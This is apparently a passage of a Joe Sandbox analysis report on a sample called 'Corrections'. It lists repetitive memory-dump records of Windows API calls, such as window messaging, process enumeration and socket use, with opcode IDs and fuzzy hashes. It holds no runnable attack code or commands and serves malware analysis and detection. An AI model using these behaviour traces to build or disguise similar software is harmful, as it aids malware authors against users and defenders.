                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                            • Opcode ID: 46b212c2ca7352d9a0563dfe10473f9ddd0b502ceb68eba52d2ba7e0058f1e3c
                                                                                                                                                                                                                                                                                            • Instruction ID: 398a386bdf721586d573d1559695784f485048d2b0757e48eb5c988cd65e3c77
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46b212c2ca7352d9a0563dfe10473f9ddd0b502ceb68eba52d2ba7e0058f1e3c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B221BF32650219BBDF118F94CD82FEB3B69EF88728F110214FA156B1D1D6B1A855EB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009B51A3
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009B51B1
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009B51B8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                            • Opcode ID: 577581ccd56ebbad27c0115440ba4629b6cf0c7daa17e9d2c0c43afcdc586c54
                                                                                                                                                                                                                                                                                            • Instruction ID: 945b4b399a634aff181ea7134b1beb2e562820ad236a08cecbda278a962b6e36
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 577581ccd56ebbad27c0115440ba4629b6cf0c7daa17e9d2c0c43afcdc586c54
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62219DB5604609AFDB00DF68DD81FBB37ADEF9A368B050149F9009B361CB70EC11DAA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009B42DC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009B42EC
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009B4312
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                            • Opcode ID: a1a6ea5846f86e6cab5f2209e3d65e77f1b5fa1b78c3d7fb2afa70de0753aa15
                                                                                                                                                                                                                                                                                            • Instruction ID: ea32146f38c90510171c2346288fb21cbbe16687579a47fb0d2f80c7c0f96720
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1a6ea5846f86e6cab5f2209e3d65e77f1b5fa1b78c3d7fb2afa70de0753aa15
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7821AF32614118BBEF118F94CD84FEB3B6EEB89764F118114F9109B191CA719C52A7A0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0099544D
                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009954A1
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,009BDCD0), ref: 00995515
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                                                                                                                                            • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                            • Opcode ID: f019d1ee8f3703007ef3c9c0f31fd131ab6b0e34a48aa74262459241976f4688
                                                                                                                                                                                                                                                                                            • Instruction ID: 3ae588e56bdbddb649cd95e6ffd24e1eaaa078a0440b128db65f802dc676d72e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f019d1ee8f3703007ef3c9c0f31fd131ab6b0e34a48aa74262459241976f4688
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B319370A04109AFDB11DF68C984EAA77F8EF44308F1540A4F409DB362D771EE41CB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009B4CED
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009B4D02
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009B4D0F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                            • Opcode ID: d7a4f62f6cee69b3ebef0aed27c90edc2276e6764273aadd2766b1b8399084c1
                                                                                                                                                                                                                                                                                            • Instruction ID: e3a2d690f7af80f1a616d59907ba7436420de64311ecfdab31942997fe049ea7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7a4f62f6cee69b3ebef0aed27c90edc2276e6764273aadd2766b1b8399084c1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A11C171240248BEEF215EA5CC46FEB3BACEB85B64F110514FA55E60A1D671D851AB10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                              • Part of subcall function 009836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00983712
                                                                                                                                                                                                                                                                                              • Part of subcall function 009836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00983723
                                                                                                                                                                                                                                                                                              • Part of subcall function 009836F4: GetCurrentThreadId.KERNEL32 ref: 0098372A
                                                                                                                                                                                                                                                                                              • Part of subcall function 009836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00983731
                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 009838C4
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098373B: GetParent.USER32(00000000), ref: 00983746
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0098390F
                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00983987), ref: 00983937
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                            • Opcode ID: 17beb06d1ec937ff4082a97720b4d7a12dfd21ec8f313d172a38444c785973da
                                                                                                                                                                                                                                                                                            • Instruction ID: 5de36ef2fcd270d9ac19d829998b4c6849f9961096d00c37c78dd8799fa9af5e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17beb06d1ec937ff4082a97720b4d7a12dfd21ec8f313d172a38444c785973da
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F611D571600205ABCF11BF749D86FEE77699FD4704F008075FD099B296EE719A059B20
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009B6360
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009B638D
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 009B639C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: e40c3e22a865c4623dac47a2598500d2decef1a63b5afa9f93a6438578184f6c
                                                                                                                                                                                                                                                                                            • Instruction ID: cf717e67660cfd8a6c3dfa6fa13e638416a185c7ea124ffaa35f5cd1919d66be
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e40c3e22a865c4623dac47a2598500d2decef1a63b5afa9f93a6438578184f6c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E016D32514218AFDB219F11DC84FEEBBB8FB88361F108099F949D6150DB788A85EF21
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0097E797
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32 ref: 0097E7BD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                            • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                                            • Opcode ID: 6eac0f6903bc410f967924d10c9ea7746bb2ff0c42c48007856a3e3e9777b160
                                                                                                                                                                                                                                                                                            • Instruction ID: 1fb2353fe3234a5d974538483fcb2bbab19ad56462c5238a8c4a7c0194cf7351
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6eac0f6903bc410f967924d10c9ea7746bb2ff0c42c48007856a3e3e9777b160
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EE02B72C1B714DBD73A57244C48EAA32586F14B01F1489E4EC09F6150EB28CC448654
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: fd8437915002d4a2e405be6437d6c36e6ae728e4469e98c930b26fc85038e63b
                                                                                                                                                                                                                                                                                            • Instruction ID: ec461fd3790419f390646c30db45eec0fd6c7880911b8b7b51572ab2a16cc748
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd8437915002d4a2e405be6437d6c36e6ae728e4469e98c930b26fc85038e63b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85C15975A0020AEFDB44DF94C898AAEB7B9FF88704F108598E405EB351D731EE85CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                            • Instruction ID: 07d0a858525e5ee27f48f123d2f40fed2775b5d939899b3a4746bb58dd41e3d4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4A19A729443869FDB21CF1AC8917AEBBE8EF51319F1441ADED959B2A1C3388CC9C750
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009C0BD4,?), ref: 00980EE0
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009C0BD4,?), ref: 00980EF8
                                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,009BDCE0,000000FF,?,00000000,00000800,00000000,?,009C0BD4,?), ref: 00980F1D
                                                                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00980F3E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ca1e555a485901ccd3b2e06f3c02bcb08c2f28eea163c41684fe6094fcde63cf
                                                                                                                                                                                                                                                                                            • Instruction ID: 4bf89f048ff88fb3579e884cf5a02632c33903d6e393466b894518a69aff1cce
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca1e555a485901ccd3b2e06f3c02bcb08c2f28eea163c41684fe6094fcde63cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A811B71A00209EFCB54DF94C984EEEB7B9FF89315F204558F506AB251DB71AE0ACB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 009AB10C
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 009AB11A
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 009AB1FC
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009AB20B
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00964D73,?), ref: 0093E395
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 28b01b644963d77c37f29ddf4cc7697b6871d7d648f9fbdcce358a39447665cd
                                                                                                                                                                                                                                                                                            • Instruction ID: 80c6c54cef34bf353be751d954a953611bed21d07fd09347b18e0c3e343bd6f5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28b01b644963d77c37f29ddf4cc7697b6871d7d648f9fbdcce358a39447665cd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA51F7B1508311AFD310EF24D886A5BBBE8FF89754F40492DF599972A1EB70E904CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 661d175e58aae3e81ba182085c07a6ed7c303702731a4e78be8c144e449a3ea9
                                                                                                                                                                                                                                                                                            • Instruction ID: ad7e1cb2cb88f0b80111ab64bd762d487bdea42eb85c439a113267f509ad9c68
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 661d175e58aae3e81ba182085c07a6ed7c303702731a4e78be8c144e449a3ea9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2412731A00105ABDB21BFBE8C42F7E3AA8EF85370F2D0625F818D71A1EA35484557A1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 009A255A
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 009A2568
